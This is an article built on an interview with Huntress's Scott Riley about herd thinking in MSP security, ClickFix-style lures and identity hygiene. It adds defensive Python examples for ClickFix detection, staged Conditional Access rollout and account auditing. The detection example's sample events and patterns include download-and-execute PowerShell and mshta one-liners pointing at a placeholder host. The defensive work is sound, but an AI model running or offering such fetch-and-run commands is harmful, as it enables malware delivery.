Is herd mentality the weak point in cybersecurity? Why defence still falls short when everyone thinks the same way

Based on an exclusive interview with Scott Riley, Principal Product Manager for Identity Security Posture Management at Huntress, the piece explores how herd mentality in MSP cybersecurity is driving tool sprawl and a mistaken sense of innovation.

Cybersecurity is increasingly shaped by alert overload, misconfigurations, and fast-moving threats that outpace response. Huntress positions itself as a security company focused on simplifying how MSPs detect and respond to real-world risk by surfacing actionable threats rather than adding to the noise.

Originally built for endpoint detection in underserved environments, the platform has expanded into identity and human risk as attacks have shifted. Huntress’ platform integrates with existing MSP tools and is supported by a 24/7 human‑led, AI‑centric SOC, enabling partners to investigate and respond without large in-house security teams.

Rather than competing on dashboards or feature sets, Huntress focuses on interpretation and response, helping MSPs prioritise the risks that matter most.

When best practice becomes copy-paste security

Riley argues that herd thinking in cybersecurity is most visible in how MSPs design their security portfolios. Tooling decisions, he suggests, are driven less by adversary behaviour or organisational risk and more by peer adoption, vendor packaging, and prevailing notions of “best practice” in the market. This produces a high degree of convergence: similar Microsoft SKUs, similar security add-ons, and service catalogues that are largely interchangeable across providers.

He extends this point to the security stack itself, where MSPs frequently accumulate layers of tools under the assumption that more products equate to more protection. In practice, this often produces the opposite effect: fragmented visibility, excessive alert volume, and systems that are technically deployed but operationally underused. A strong toolset does not necessarily translate into a strong security posture when no one has the capacity to monitor or act on what those tools generate.

Riley argues that this pattern is structural in MSP behaviour: “The security stack obsession is the clearest symptom. MSPs bolt product after product onto the pile, convinced that more tools equals more security. It doesn't. It means more dashboards nobody monitors, more alerts nobody has time to triage, and more configuration nobody ever finishes. You can have world-class tooling and a fundamentally weak posture. Most do. The stack is the most visible form of herd behaviour: if every other MSP is buying it, buying it must be what good looks like.”

Over time, this creates a form of structural sameness across the industry. Different vendors and branding on the surface mask very similar blind spots underneath. Rather than optimising around how attackers operate, many MSPs inadvertently optimise around how other MSPs configure their environments, turning “best practice” into a shared ceiling rather than a differentiator.

The AI arms race is mostly one-sided

Riley frames today’s cybersecurity discourse as an “AI arms race” between defenders and attackers, but argues that this framing sits more at the narrative layer than in day-to-day defensive reality. From his perspective, attackers are already operating with AI as a default capability rather than a future advantage.

Recent activity patterns reinforce this shift. Techniques such as ClickFix surged in late 2025 not because they are technically complex, but because they are operationally efficient. Instead of traditional phishing that prompts users to download malicious files, attackers direct victims to “fix” a fake problem (a broken page, a failed CAPTCHA check) by pasting an attacker-supplied command into the Run dialog or a terminal, where tools already present on the system, such as PowerShell or mshta, fetch and run the payload. No file crosses the browser’s download path, so the controls built around that path never see it. The exploit is behavioural as much as technical, targeting users’ instinct to resolve problems quickly. AI amplifies this by generating scripts in seconds, localising language, and scaling tailored social engineering. What once required skilled operators can now be produced almost instantly and at minimal cost.

By early 2026, variants pushed this further by manufacturing the problem itself, deliberately destabilising browser sessions so that attacker instructions appear as the logical remedy. The pattern is consistent in Riley’s analysis: attackers are no longer just delivering lures but engineering urgency.
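As an added example, not code from the article or from Huntress, here is a ClickFix-style detection heuristic run over constructed process-creation events. It assumes telemetry in the shape of Sysmon Event ID 1 (image, parent image, command line) and keys on the one thing a Run-dialog paste reliably produces: explorer.exe spawning an interpreter with a command line that looks like a download-and-execute one-liner. The patterns, thresholds and sample events are assumptions of the example, not Huntress detection logic.

```python
"""ClickFix-style detection heuristic over process-creation telemetry.

Added example for this article; not Huntress code. Assumes events resemble
Sysmon Event ID 1 (image, parent image, command line) and that a Run-dialog
paste shows up as explorer.exe spawning an interpreter directly. The sample
events below are constructed, not real telemetry.
"""
from __future__ import annotations
import re

# Interpreters that ClickFix lures typically hand the pasted command to.
INTERPRETERS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe",
                "wscript.exe", "cscript.exe"}
# Parents that indicate a user-driven launch (Run dialog, desktop shortcut).
USER_SHELL_PARENTS = {"explorer.exe"}

# Command-line markers of download-and-execute one-liners. Heuristic, not exhaustive.
CONTENT_PATTERNS = {
    "download cradle": re.compile(r"(?i)\b(iwr|invoke-webrequest|irm|invoke-restmethod|curl|wget)\b"),
    "in-memory execution": re.compile(r"(?i)\b(iex|invoke-expression)\b"),
    "mshta remote payload": re.compile(r"(?i)\bmshta(\.exe)?\b.*https?://"),
    "encoded command": re.compile(r"(?i)-(enc|encodedcommand|e)\s+[A-Za-z0-9+/=]{20,}"),
    "hidden window": re.compile(r"(?i)-w(indowstyle)?\s+hidden"),
    # Lures often append a fake CAPTCHA comment so the pasted line "looks right".
    "lure comment": re.compile(r"(?i)I am not a robot|Verification ID"),
}


def _basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def score_event(ev: dict) -> dict:
    """Classify one process-creation event.

    Flags when a user shell spawned an interpreter AND the command line carries
    at least one content marker, or when two or more content markers appear
    regardless of parent (covers scheduled-task or cmd -> powershell chains).
    Requiring both halves for the explorer.exe case keeps 'cmd /c ipconfig'
    from alerting.
    """
    image, parent = _basename(ev["image"]), _basename(ev["parent_image"])
    cmd = ev.get("command_line", "")
    reasons = []
    parent_hit = image in INTERPRETERS and parent in USER_SHELL_PARENTS
    if parent_hit:
        reasons.append(f"{parent} spawned {image} directly")
    content_hits = [name for name, pat in CONTENT_PATTERNS.items() if pat.search(cmd)]
    reasons.extend(f"command line: {name}" for name in content_hits)
    flagged = (parent_hit and len(content_hits) >= 1) or len(content_hits) >= 2
    return {"id": ev.get("id"), "user": ev.get("user"), "flagged": flagged, "reasons": reasons}


def detect(events: list[dict]) -> list[dict]:
    """Return verdicts for flagged events only, in input order."""
    return [v for v in (score_event(e) for e in events) if v["flagged"]]


SAMPLE_EVENTS = [  # constructed for the example
    {"id": 1, "user": "CORP\\alice", "parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": 'powershell -w hidden -c "iwr https://example.invalid/verify.ps1 | iex" '
                     '# I am not a robot - reCAPTCHA Verification ID: 8412'},
    {"id": 2, "user": "CORP\\bob", "parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\mshta.exe",
     "command_line": "mshta https://example.invalid/fix"},
    {"id": 3, "user": "CORP\\dave", "parent_image": r"C:\Program Files\Microsoft VS Code\Code.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": "powershell -ExecutionPolicy Bypass -File build.ps1"},
    {"id": 4, "user": "CORP\\erin", "parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\cmd.exe",
     "command_line": "cmd /c ipconfig /all"},
    {"id": 5, "user": "NT AUTHORITY\\SYSTEM", "parent_image": r"C:\Windows\System32\svchost.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": "powershell.exe -nop -w hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA"},
]

if __name__ == "__main__":
    for verdict in detect(SAMPLE_EVENTS):
        print(verdict["id"], verdict["user"], "; ".join(verdict["reasons"]))
```

Events 1, 2 and 5 are flagged; the developer build (3) and the plain `ipconfig` from the Run dialog (4) are not. In a real deployment the explorer.exe parent check is the cheap, high-precision half of the rule; the content patterns need tuning per environment, and the RunMRU registry key on the endpoint is the corroborating artefact to pull when an alert fires.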

Telemetry reinforces this acceleration. Microsoft’s 2025 State of Cybersecurity reports lateral movement typically beginning within about 48 minutes of initial access, with the fastest observed cases at 51 seconds. Combined with dwell times now measured in roughly 10 to 12 days, the data points to increasingly automated and tightly orchestrated intrusion chains.

As Riley observes from his work tracking these patterns: “Attackers are getting in and out exponentially faster than before. Calling it an arms race probably flatters the defensive side. Attackers are the ones actually running. They have operationalised AI across phishing, scripting, reconnaissance, and lateral movement.”

Seen in this light, the “arms race” framing becomes uneven. Attackers are already operationalising AI across multiple stages of the intrusion lifecycle, while many defensive environments, particularly in the MSP space, remain structured around reacting after activity occurs. The result is less a race between equals, and more a widening gap between attacker velocity and defensive response.

Innovation or iteration in disguise

Riley’s take on the managed service provider (MSP) channel is that what often gets labelled as innovation is usually just optimisation within the same underlying framework. Incremental automation, slightly improved bundles, and extra layers on top of familiar Microsoft-centric stacks are framed as progress, but in his view, they rarely amount to anything fundamentally new.

The structure underneath stays remarkably stable. Tools evolve, complexity increases, and new features are added, but the operating model itself barely shifts: manage more systems, add more controls, and present that accumulation as advancement. Riley’s point is that this creates a kind of “surface-level sophistication”, where things look more advanced without really changing what the business is responsible for, or how it is held accountable.

As he explains it, drawing a sharper line between refinement and real change: “A bit more automation, a marginally better bundle, another layer on the same Microsoft stack, that’s refinement. Real innovation would be when a partner changes what they’re accountable for. Shifting from ‘we manage your tools’ to ‘we own your identity risk posture and we’ll prove it with metrics and enforced controls.’ That’s a different business, not a better version of the same one.”

Riley frames it almost as a test. If something called “innovation” doesn’t require changes to operations, incentives, SLAs, or how success is measured, then it isn’t transformation at all, just optimisation with better branding.

The case for controlled risk in defence

Cybersecurity defenders operate under constraints attackers do not, balancing security with user experience and accountability. Attackers, by contrast, only need to make their approach work. That imbalance creates a structural disadvantage and shapes how risk is treated on the defensive side.

Within this context, “healthy” risk-taking is not about recklessness, but about designing for controlled impact rather than avoiding impact altogether. That includes canary deployments, pilot groups, reversible changes, and scoped experiments. It also means accepting that inaction can sometimes represent the greater risk.

Riley’s view is that defenders often default to “do nothing” as the safest option, even when it increases exposure. In his analysis, the alternative is a bias towards faster, smaller decisions that prioritise containment and learning over delay.

He points to Huntress’ response during the Railway campaign as an example. When faced with an active credential theft campaign, the team deployed a protective Conditional Access control across ITDR partners, with safeguards and reversibility built in. While some customers would have preferred more notice, the move reflects a decision model built around acting in real time while constraining downside risk. Riley argues that in fast-moving intrusion scenarios like this, attackers do not need especially sophisticated techniques; they just need defenders to move slower than the threat.
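The controlled-impact pattern described above (pilot groups, reversible changes, scoped experiments) can be made concrete. The following is an added example, not Huntress code and not the control Huntress deployed: a legacy-authentication block policy staged as report-only, scoped to a pilot group, with the break-glass account excluded, a promotion gate that refuses to enforce until report-only results show a bounded blast radius, and a one-field rollback. The policy dict follows the Microsoft Graph conditionalAccessPolicy shape, so it is the same JSON you would POST to /identity/conditionalAccess/policies; the group id, user ids and sign-in records are constructed, and the 5% impact threshold is an assumption.

```python
"""Reversible, scoped Conditional Access rollout, modelled offline.

Added example for this article; not Huntress code. The policy dict follows
the Microsoft Graph conditionalAccessPolicy resource shape; the pilot group,
user ids, sign-in records and impact threshold are constructed assumptions.
"""
from __future__ import annotations
import copy

REPORT_ONLY = "enabledForReportingButNotEnforced"
ENFORCED = "enabled"
DISABLED = "disabled"

PILOT_GROUP = "g-pilot"        # constructed object id of the pilot group
BREAK_GLASS = "u-breakglass"   # constructed object id of the emergency-access account


def legacy_auth_block_policy() -> dict:
    """Block legacy authentication for a pilot group, report-only first, with
    the break-glass account excluded so a bad rollout cannot lock out the tenant."""
    return {
        "displayName": "Pilot - Block legacy authentication",
        "state": REPORT_ONLY,
        "conditions": {
            "users": {"includeGroups": [PILOT_GROUP], "excludeUsers": [BREAK_GLASS]},
            "applications": {"includeApplications": ["All"]},
            # These two clientAppTypes are the legacy (non-modern-auth) clients.
            "clientAppTypes": ["exchangeActiveSync", "other"],
        },
        "grantControls": {"operator": "OR", "builtInControls": ["block"]},
    }


def in_scope(policy: dict, signin: dict) -> bool:
    """Do the policy's user, application and client-app conditions match this sign-in?"""
    cond = policy["conditions"]
    users = cond["users"]
    if signin["user"] in users.get("excludeUsers", []):
        return False  # exclusions win over inclusions, as in Entra
    user_match = ("All" in users.get("includeUsers", [])
                  or signin["user"] in users.get("includeUsers", [])
                  or any(g in users.get("includeGroups", []) for g in signin["groups"]))
    if not user_match:
        return False
    apps = cond["applications"]["includeApplications"]
    if "All" not in apps and signin["app"] not in apps:
        return False
    return signin["client_app"] in cond["clientAppTypes"]


def evaluate(policy: dict, signins: list[dict]) -> list[tuple[str, str]]:
    """Outcome per sign-in: 'allowed', 'blocked', or 'wouldBlock' in report-only mode."""
    results = []
    for s in signins:
        if policy["state"] == DISABLED or not in_scope(policy, s):
            results.append((s["user"], "allowed"))
            continue
        controls = policy["grantControls"]["builtInControls"]
        denied = "block" in controls or ("mfa" in controls and not s.get("mfa", False))
        if not denied:
            outcome = "allowed"
        elif policy["state"] == REPORT_ONLY:
            outcome = "wouldBlock"
        else:
            outcome = "blocked"
        results.append((s["user"], outcome))
    return results


def promote_if_safe(policy: dict, signins: list[dict], max_impact_ratio: float = 0.05):
    """Stage gate from report-only to enforced.

    Refuses outright if the break-glass account is not excluded or shows any
    impact; stays report-only if more than max_impact_ratio of observed sign-ins
    would be blocked (those clients still need migrating off legacy auth).
    Returns (policy copy, users that would have been blocked)."""
    if BREAK_GLASS not in policy["conditions"]["users"].get("excludeUsers", []):
        raise ValueError("break-glass account must be excluded before rollout")
    outcomes = evaluate(policy, signins)
    if any(u == BREAK_GLASS and o != "allowed" for u, o in outcomes):
        raise ValueError("policy would affect the break-glass account")
    impacted = [u for u, o in outcomes if o == "wouldBlock"]
    promoted = copy.deepcopy(policy)
    if signins and len(impacted) / len(signins) <= max_impact_ratio:
        promoted["state"] = ENFORCED
    return promoted, impacted


def rollback(policy: dict) -> dict:
    """Reversibility: disabling is a one-field change, never a delete."""
    reverted = copy.deepcopy(policy)
    reverted["state"] = DISABLED
    return reverted


# Constructed sign-in records; the shape loosely follows Entra sign-in logs.
SAMPLE_SIGNINS = [
    {"user": "u-alice", "groups": [PILOT_GROUP], "app": "Office 365 Exchange Online", "client_app": "browser", "mfa": True},
    {"user": "u-alice", "groups": [PILOT_GROUP], "app": "Office 365 Exchange Online", "client_app": "exchangeActiveSync", "mfa": False},
    {"user": "u-bob", "groups": [PILOT_GROUP], "app": "Microsoft Teams", "client_app": "mobileAppsAndDesktopClients", "mfa": True},
    {"user": "u-carol", "groups": ["g-finance"], "app": "Office 365 Exchange Online", "client_app": "other", "mfa": False},
    {"user": BREAK_GLASS, "groups": [PILOT_GROUP], "app": "Azure Portal", "client_app": "other", "mfa": False},
    {"user": "u-bob", "groups": [PILOT_GROUP], "app": "Azure Portal", "client_app": "browser", "mfa": True},
]

if __name__ == "__main__":
    staged, impacted = promote_if_safe(legacy_auth_block_policy(), SAMPLE_SIGNINS)
    print(staged["state"], impacted)  # stays report-only: 1 of 6 sign-ins would be blocked
```

With the default 5% threshold the policy stays in report-only because alice’s ActiveSync client would be cut off; raising the threshold (or migrating that client first) lets the gate flip the state to enabled, and `rollback` returns every sign-in to allowed without deleting the policy or its history. The break-glass account is in the pilot group on purpose to show that the exclusion, not group membership, is what protects it.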

The AI gap that actually matters

Riley argues that the biggest gap between AI capability and how MSPs and security vendors are using it is not in threat detection or attack sophistication, but in operational execution. Despite the focus on AI-powered attackers, most breaches still come down to familiar fundamentals. AI has not changed the core techniques; it has just made them faster, cheaper, and easier to scale.

Riley points to the same issues across large environments: weak or reused passwords, inconsistent MFA adoption, legacy authentication still enabled, excessive privileges, and stale accounts left in place. These are not tool gaps. In most cases the tooling already exists; it is simply not applied consistently.

That gap is reinforced by how MSP services are structured. Identity hardening and basic hygiene are still often treated as optional workstreams rather than baseline requirements, even though breaches rarely respect those boundaries.
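To show what applying the existing tooling consistently looks like as a check rather than a sentiment, here is an added example (not Huntress code) that audits a constructed Entra-style user inventory and sign-in log for four of the gaps listed above: privileged accounts without MFA, successful legacy-authentication sign-ins, high-privilege roles on service accounts, and stale enabled accounts. Weak or reused passwords need a hash comparison and are not covered. The 90-day staleness window, the role and client-app lists, and the records themselves are assumptions of the example.

```python
"""Identity hygiene audit over a constructed Entra-style inventory.

Added example for this article; not Huntress code. Covers MFA gaps, legacy
authentication, excessive privilege and stale accounts. Thresholds, role
names, client-app names and all records are constructed assumptions.
"""
from __future__ import annotations
from datetime import date, timedelta

AS_OF = date(2026, 3, 1)              # assumed audit date
STALE_AFTER = timedelta(days=90)
# clientAppUsed values that indicate legacy (basic) authentication.
LEGACY_CLIENTS = {"Exchange ActiveSync", "IMAP4", "POP3", "Authenticated SMTP", "Other clients"}
HIGH_PRIV_ROLES = {"Global Administrator", "Privileged Role Administrator", "Exchange Administrator"}
MAX_GLOBAL_ADMINS = 4

SEVERITY_RANK = {"critical": 0, "high": 1, "medium": 2}


def audit(users: list[dict], signins: list[dict], as_of: date = AS_OF) -> list[tuple[str, str, str]]:
    """Return (severity, subject, finding) tuples, most severe first."""
    findings = []
    last_success: dict[str, date] = {}
    legacy_users: set[str] = set()
    for s in signins:
        if s["status"] != "success":
            continue  # failed attempts do not prove the account is live or that legacy auth works
        last_success[s["user"]] = max(last_success.get(s["user"], date.min), s["date"])
        if s["client_app"] in LEGACY_CLIENTS:
            legacy_users.add(s["user"])

    global_admins = [u["upn"] for u in users if u["enabled"] and "Global Administrator" in u["roles"]]
    if len(global_admins) > MAX_GLOBAL_ADMINS:
        findings.append(("high", "(tenant)",
                         f"{len(global_admins)} Global Administrators, expected at most {MAX_GLOBAL_ADMINS}"))

    for u in users:
        if not u["enabled"]:
            continue  # disabled accounts are a separate clean-up list
        upn = u["upn"]
        privileged = bool(set(u["roles"]) & HIGH_PRIV_ROLES)
        if privileged and not u["mfa_registered"]:
            findings.append(("critical", upn, "privileged account without MFA"))
        elif not u["mfa_registered"]:
            findings.append(("high", upn, "no MFA method registered"))
        if upn in legacy_users:
            findings.append(("high", upn, "successful legacy authentication sign-in"))
        if privileged and u.get("is_service_account", False):
            findings.append(("high", upn, "service account holds a high-privilege role"))
        seen = last_success.get(upn)
        if seen is None or as_of - seen > STALE_AFTER:
            findings.append(("high" if privileged else "medium", upn,
                             f"stale account: no successful sign-in in {STALE_AFTER.days} days"))
    return sorted(findings, key=lambda f: (SEVERITY_RANK[f[0]], f[1]))


# Constructed inventory and sign-in log.
SAMPLE_USERS = [
    {"upn": "alice@example.com", "roles": [], "mfa_registered": True, "enabled": True},
    {"upn": "bob@example.com", "roles": ["Global Administrator"], "mfa_registered": False, "enabled": True},
    {"upn": "carol@example.com", "roles": [], "mfa_registered": False, "enabled": True},
    {"upn": "dave@example.com", "roles": [], "mfa_registered": True, "enabled": True},
    {"upn": "svc-backup@example.com", "roles": ["Exchange Administrator"], "mfa_registered": False,
     "enabled": True, "is_service_account": True},
    {"upn": "erin@example.com", "roles": ["Global Administrator"], "mfa_registered": True, "enabled": False},
]
SAMPLE_SIGNINS = [
    {"user": "alice@example.com", "date": date(2026, 2, 20), "client_app": "Browser", "status": "success"},
    {"user": "bob@example.com", "date": date(2026, 2, 25), "client_app": "Browser", "status": "success"},
    {"user": "carol@example.com", "date": date(2026, 2, 10), "client_app": "IMAP4", "status": "success"},
    {"user": "dave@example.com", "date": date(2025, 10, 1), "client_app": "Browser", "status": "success"},
    {"user": "dave@example.com", "date": date(2026, 2, 27), "client_app": "IMAP4", "status": "failure"},
    {"user": "svc-backup@example.com", "date": date(2026, 2, 28),
     "client_app": "Mobile Apps and Desktop clients", "status": "success"},
]

if __name__ == "__main__":
    for severity, subject, finding in audit(SAMPLE_USERS, SAMPLE_SIGNINS):
        print(f"{severity:8} {subject:25} {finding}")
```

The ordering is the point: the two privileged accounts without MFA come out first, carol’s basic-auth IMAP use and missing MFA next, and dave’s dormant account last. Dave’s failed IMAP attempt deliberately does not count as legacy use or as recent activity; a spray against a dormant mailbox should not make it look alive.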

He also highlights the operational pressure MSPs are under, from support queues to billing and service delivery. This is where AI has the most immediate value. As he puts it, "That’s exactly where they should be leaning harder on AI: to chew through operational noise like ticket triage, knowledge base lookups, report drafting, and billing workflows so they can win back focus time to sit with clients and actually get them to a more resilient place."

The result is a mismatch: AI is often used to improve communication, while attackers use it to scale familiar techniques like phishing and password spraying. Until AI is directed more deliberately at operational and hygiene gaps, defenders will continue to fall behind on the fundamentals.

Moving beyond herd-driven detection and response

A herd-driven security model emerges when MSPs standardise on the same stacks and frameworks and measure success by alignment rather than outcomes. Environments start to look identical, controls get duplicated, and the end result is often more noise than clarity.

Huntress takes a different approach. Detection is only the starting point. Every alert is routed through a 24/7 human‑led, AI‑centric SOC where analysts focus on real attacker behaviour and turn signals into decisions, not extra workload.

AI is used to help them investigate, correlate, and communicate faster by summarising data and connecting related activity, but final judgement stays with humans. That balance is intentional, especially as AI adoption in the market often increases alert fatigue rather than reducing it.

Riley states that one of the key advantages is feedback. Insights from attacks across the customer base feed directly into detections and response playbooks, improving accuracy over time. Riley describes it simply: “For MSPs, that means less time acting like an alert-clearing shop and more time delivering measurable security value to customers.”

This approach extends into prevention through Managed ISPM and Managed ESPM, shifting focus earlier to misconfigurations and excessive permissions so issues are addressed before they become incidents.

What will separate effective defenders in the coming years

Looking ahead, the real gap between strong and weak defenders will not be technology. It will be how fast organisations learn and adapt compared to attackers.

Riley points to Black Box Thinking by Matthew Syed and the contrast between aviation and medicine. Aviation became safer because it built tight feedback loops where every incident and near-miss is captured, analysed, and fed back into the system. Medicine, for much of its history, kept learning more local, slower, and less systematic.

Cybersecurity in the MSP model still often looks closer to that second pattern. Incidents get resolved, tickets close, and the learning rarely travels far enough to prevent repeat issues elsewhere.

The organisations that pull ahead will behave more like aviation. Every incident improves detections, sharpens controls, and updates playbooks. Near-misses become inputs, not afterthoughts.

Technology and AI will matter, but they are not the differentiator. The real edge will come from breaking herd thinking and building systems that continuously learn faster than attackers evolve.
